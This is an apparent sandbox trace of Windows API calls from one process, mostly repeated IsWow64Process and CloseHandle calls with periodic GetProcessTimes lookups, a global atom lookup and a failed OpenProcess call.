	[0142.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.784] CloseHandle (hObject=0x2dc) returned 1
	[0142.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.785] CloseHandle (hObject=0x2dc) returned 1
	[0142.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.785] CloseHandle (hObject=0x2dc) returned 1
	[0142.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.785] CloseHandle (hObject=0x2dc) returned 1
	[0142.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.786] CloseHandle (hObject=0x2dc) returned 1
	[0142.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.786] CloseHandle (hObject=0x2dc) returned 1
	[0142.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.786] CloseHandle (hObject=0x2dc) returned 1
	[0142.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.786] CloseHandle (hObject=0x2dc) returned 1
	[0142.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.787] CloseHandle (hObject=0x2dc) returned 1
	[0142.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.787] CloseHandle (hObject=0x2dc) returned 1
	[0142.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.787] CloseHandle (hObject=0x2dc) returned 1
	[0142.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.788] CloseHandle (hObject=0x2dc) returned 1
	[0142.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.788] CloseHandle (hObject=0x2dc) returned 1
	[0142.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.788] CloseHandle (hObject=0x2dc) returned 1
	[0142.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.789] CloseHandle (hObject=0x2dc) returned 1
	[0142.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.789] CloseHandle (hObject=0x2dc) returned 1
	[0142.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.789] CloseHandle (hObject=0x2dc) returned 1
	[0142.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.789] CloseHandle (hObject=0x2dc) returned 1
	[0142.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.790] CloseHandle (hObject=0x2dc) returned 1
	[0142.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.790] CloseHandle (hObject=0x2dc) returned 1
	[0142.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.790] CloseHandle (hObject=0x2dc) returned 1
	[0142.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.790] CloseHandle (hObject=0x2dc) returned 1
	[0142.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.791] CloseHandle (hObject=0x2dc) returned 1
	[0142.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.791] CloseHandle (hObject=0x2dc) returned 1
	[0142.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.791] CloseHandle (hObject=0x2dc) returned 1
	[0142.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.791] CloseHandle (hObject=0x2dc) returned 1
	[0142.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.792] CloseHandle (hObject=0x2dc) returned 1
	[0142.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.792] CloseHandle (hObject=0x2dc) returned 1
	[0142.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.793] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0142.793] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0142.793] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.793] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0142.793] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.794] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0142.794] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0142.794] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0142.794] CloseHandle (hObject=0x2dc) returned 1
	[0142.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0142.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.794] CloseHandle (hObject=0x2dc) returned 1
	[0142.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.795] CloseHandle (hObject=0x2dc) returned 1
	[0142.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.795] CloseHandle (hObject=0x2dc) returned 1
	[0142.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.795] CloseHandle (hObject=0x2dc) returned 1
	[0142.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.795] CloseHandle (hObject=0x2dc) returned 1
	[0142.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.828] CloseHandle (hObject=0x2dc) returned 1
	[0142.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.828] CloseHandle (hObject=0x2dc) returned 1
	[0142.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.828] CloseHandle (hObject=0x2dc) returned 1
	[0142.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.829] CloseHandle (hObject=0x2dc) returned 1
	[0142.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.829] CloseHandle (hObject=0x2dc) returned 1
	[0142.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.829] CloseHandle (hObject=0x2dc) returned 1
	[0142.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.829] CloseHandle (hObject=0x2dc) returned 1
	[0142.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.830] CloseHandle (hObject=0x2dc) returned 1
	[0142.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.830] CloseHandle (hObject=0x2dc) returned 1
	[0142.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.830] CloseHandle (hObject=0x2dc) returned 1
	[0142.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.830] CloseHandle (hObject=0x2dc) returned 1
	[0142.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.831] CloseHandle (hObject=0x2dc) returned 1
	[0142.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.831] CloseHandle (hObject=0x2dc) returned 1
	[0142.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.831] CloseHandle (hObject=0x2dc) returned 1
	[0142.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.831] CloseHandle (hObject=0x2dc) returned 1
	[0142.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.832] CloseHandle (hObject=0x2dc) returned 1
	[0142.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.832] CloseHandle (hObject=0x2dc) returned 1
	[0142.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.832] CloseHandle (hObject=0x2dc) returned 1
	[0142.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.832] CloseHandle (hObject=0x2dc) returned 1
	[0142.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.833] CloseHandle (hObject=0x2dc) returned 1
	[0142.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.833] CloseHandle (hObject=0x2dc) returned 1
	[0142.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.833] CloseHandle (hObject=0x2dc) returned 1
	[0142.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.834] CloseHandle (hObject=0x2dc) returned 1
	[0142.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.834] CloseHandle (hObject=0x2dc) returned 1
	[0142.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.834] CloseHandle (hObject=0x2dc) returned 1
	[0142.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.834] CloseHandle (hObject=0x2dc) returned 1
	[0142.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.835] CloseHandle (hObject=0x2dc) returned 1
	[0142.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.835] CloseHandle (hObject=0x2dc) returned 1
	[0142.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.835] CloseHandle (hObject=0x2dc) returned 1
	[0142.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.835] CloseHandle (hObject=0x2dc) returned 1
	[0142.836] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.836] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0142.836] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0142.836] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.837] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0142.837] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.837] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0142.837] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0142.837] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0142.837] CloseHandle (hObject=0x2dc) returned 1
	[0142.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0142.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.838] CloseHandle (hObject=0x2dc) returned 1
	[0142.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.838] CloseHandle (hObject=0x2dc) returned 1
	[0142.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.838] CloseHandle (hObject=0x2dc) returned 1
	[0142.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.838] CloseHandle (hObject=0x2dc) returned 1
	[0142.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.839] CloseHandle (hObject=0x2dc) returned 1
	[0142.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.870] CloseHandle (hObject=0x2dc) returned 1
	[0142.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.871] CloseHandle (hObject=0x2dc) returned 1
	[0142.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.871] CloseHandle (hObject=0x2dc) returned 1
	[0142.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.871] CloseHandle (hObject=0x2dc) returned 1
	[0142.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.871] CloseHandle (hObject=0x2dc) returned 1
	[0142.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.872] CloseHandle (hObject=0x2dc) returned 1
	[0142.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.872] CloseHandle (hObject=0x2dc) returned 1
	[0142.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.063] CloseHandle (hObject=0x2dc) returned 1
	[0143.063] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.063] CloseHandle (hObject=0x2dc) returned 1
	[0143.064] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.064] CloseHandle (hObject=0x2dc) returned 1
	[0143.064] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.064] CloseHandle (hObject=0x2dc) returned 1
	[0143.064] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.064] CloseHandle (hObject=0x2dc) returned 1
	[0143.064] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.064] CloseHandle (hObject=0x2dc) returned 1
	[0143.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.065] CloseHandle (hObject=0x2dc) returned 1
	[0143.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.065] CloseHandle (hObject=0x2dc) returned 1
	[0143.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.065] CloseHandle (hObject=0x2dc) returned 1
	[0143.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.065] CloseHandle (hObject=0x2dc) returned 1
	[0143.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.066] CloseHandle (hObject=0x2dc) returned 1
	[0143.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.066] CloseHandle (hObject=0x2dc) returned 1
	[0143.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.066] CloseHandle (hObject=0x2dc) returned 1
	[0143.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.066] CloseHandle (hObject=0x2dc) returned 1
	[0143.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.067] CloseHandle (hObject=0x2dc) returned 1
	[0143.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.067] CloseHandle (hObject=0x2dc) returned 1
	[0143.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.067] CloseHandle (hObject=0x2dc) returned 1
	[0143.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.067] CloseHandle (hObject=0x2dc) returned 1
	[0143.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.068] CloseHandle (hObject=0x2dc) returned 1
	[0143.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.068] CloseHandle (hObject=0x2dc) returned 1
	[0143.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.068] CloseHandle (hObject=0x2dc) returned 1
	[0143.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.069] CloseHandle (hObject=0x2dc) returned 1
	[0143.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.069] CloseHandle (hObject=0x2dc) returned 1
	[0143.069] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.069] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.070] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.070] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.070] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.070] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.071] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.071] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.071] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.071] CloseHandle (hObject=0x2dc) returned 1
	[0143.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.071] CloseHandle (hObject=0x2dc) returned 1
	[0143.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.071] CloseHandle (hObject=0x2dc) returned 1
	[0143.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.072] CloseHandle (hObject=0x2dc) returned 1
	[0143.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.072] CloseHandle (hObject=0x2dc) returned 1
	[0143.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.072] CloseHandle (hObject=0x2dc) returned 1
	[0143.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.113] CloseHandle (hObject=0x2dc) returned 1
	[0143.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.114] CloseHandle (hObject=0x2dc) returned 1
	[0143.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.114] CloseHandle (hObject=0x2dc) returned 1
	[0143.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.114] CloseHandle (hObject=0x2dc) returned 1
	[0143.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.114] CloseHandle (hObject=0x2dc) returned 1
	[0143.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.115] CloseHandle (hObject=0x2dc) returned 1
	[0143.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.115] CloseHandle (hObject=0x2dc) returned 1
	[0143.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.115] CloseHandle (hObject=0x2dc) returned 1
	[0143.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.116] CloseHandle (hObject=0x2dc) returned 1
	[0143.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.116] CloseHandle (hObject=0x2dc) returned 1
	[0143.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.116] CloseHandle (hObject=0x2dc) returned 1
	[0143.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.116] CloseHandle (hObject=0x2dc) returned 1
	[0143.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.117] CloseHandle (hObject=0x2dc) returned 1
	[0143.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.117] CloseHandle (hObject=0x2dc) returned 1
	[0143.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.117] CloseHandle (hObject=0x2dc) returned 1
	[0143.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.117] CloseHandle (hObject=0x2dc) returned 1
	[0143.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.118] CloseHandle (hObject=0x2dc) returned 1
	[0143.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.118] CloseHandle (hObject=0x2dc) returned 1
	[0143.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.118] CloseHandle (hObject=0x2dc) returned 1
	[0143.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.118] CloseHandle (hObject=0x2dc) returned 1
	[0143.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.119] CloseHandle (hObject=0x2dc) returned 1
	[0143.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.119] CloseHandle (hObject=0x2dc) returned 1
	[0143.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.119] CloseHandle (hObject=0x2dc) returned 1
	[0143.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.119] CloseHandle (hObject=0x2dc) returned 1
	[0143.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.120] CloseHandle (hObject=0x2dc) returned 1
	[0143.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.120] CloseHandle (hObject=0x2dc) returned 1
	[0143.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.120] CloseHandle (hObject=0x2dc) returned 1
	[0143.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.120] CloseHandle (hObject=0x2dc) returned 1
	[0143.121] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.121] CloseHandle (hObject=0x2dc) returned 1
	[0143.121] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.121] CloseHandle (hObject=0x2dc) returned 1
	[0143.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.122] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.122] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.122] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.123] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.123] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.123] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.123] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.123] CloseHandle (hObject=0x2dc) returned 1
	[0143.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.123] CloseHandle (hObject=0x2dc) returned 1
	[0143.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.124] CloseHandle (hObject=0x2dc) returned 1
